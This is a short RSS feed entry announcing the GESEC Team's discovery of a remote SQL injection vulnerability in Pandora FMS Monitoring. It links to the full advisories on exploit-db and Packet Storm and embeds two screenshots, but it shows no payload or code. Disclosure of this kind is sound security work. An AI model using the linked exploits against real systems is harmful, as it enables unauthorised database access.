		<description><![CDATA[GESEC Team(~smash &#38; ~rem0ve) discover a SQL Injection Vulnerability on Pandora FMS Monitoring. Attackers can manipulate the application DBMS over a remote sql-injection vulnerability. View complete Advsiories: http://www.exploit-db.com/exploits/10570 http://packetstormsecurity.org/0912-exploits/pandorafms-sql.txt]]></description>
			<content:encoded><![CDATA[<pre>GESEC Team(~smash &amp; ~rem0ve) discover a SQL Injection Vulnerability on Pandora FMS Monitoring.
Attackers can manipulate the application DBMS over a remote sql-injection vulnerability.
<span id="more-983"></span><strong>
View complete Advsiories:</strong>

http://www.exploit-db.com/exploits/10570

http://packetstormsecurity.org/0912-exploits/pandorafms-sql.txt

<img class="alignnone" src="http://global-evolution.info/news/files/pandora2/sql1.png" alt="" width="630" height="335" />
<img class="alignnone" src="http://global-evolution.info/news/files/pandora2/sql2.png" alt="" width="630" height="335" /></pre>
]]></content:encoded>
			<wfw:commentRss>http://www.global-evolution.info/news/?feed=rss2&amp;p=983</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
